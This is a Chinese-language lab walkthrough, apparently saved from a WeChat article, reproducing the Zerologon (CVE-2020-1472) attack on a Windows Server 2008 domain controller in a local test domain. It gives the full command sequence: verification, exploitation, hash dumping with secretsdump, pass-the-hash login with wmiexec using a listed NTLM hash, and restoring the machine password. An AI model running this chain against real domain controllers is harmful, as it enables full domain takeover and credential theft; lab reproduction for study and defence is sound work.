Skip to content

Latest commit

 

History

History
72 lines (38 loc) · 3.83 KB

CVE-2020-1472 复现.md

File metadata and controls

72 lines (38 loc) · 3.83 KB

> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/VocwBdC6XpgosxrxpIR7EA)

**攻击机:kali2020      受害者:windows2008
https://github.com/SecuraBV/CVE-2020-1472    poc
https://github.com/dirkjanm/CVE-2020-1472     exp
1、本地搭建一个域环境
**

2、使用 poc 验证
既然提示安装东西,那就   pip install -r requirements.txt  , 之后再执行     python3 zerologon_tester.py <主机名>

3、使用 exp 攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,https://github.com/SecureAuthCorp/impacket  ,python3 setup.py install  // 安装 impacket,然后执行 exp
python3 cve-2020-1472-exploit.py owa 192.168.137.137

4、使用 impacket 的 secretsdump.py 导出域控制上的 hash
python3 secretsdump.py god.org/owa\[email protected] -no-pass

5、利用获取到的管理员 hash 来远程操作域控服务器
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/[email protected]

6、获取管理员 hash,远程连接导出 sam 数据库中的原来的计算机 hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

7、恢复计算机的 hash
下载脚本 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4     // 注意 hash 的部分,只有后半部分

8、恢复计算机的 hash
使用 impacket 的脚本来登录域控来验证 hash
使用 7 步骤的脚本回复 hash 前

使用 7 步骤脚本恢复 hash 后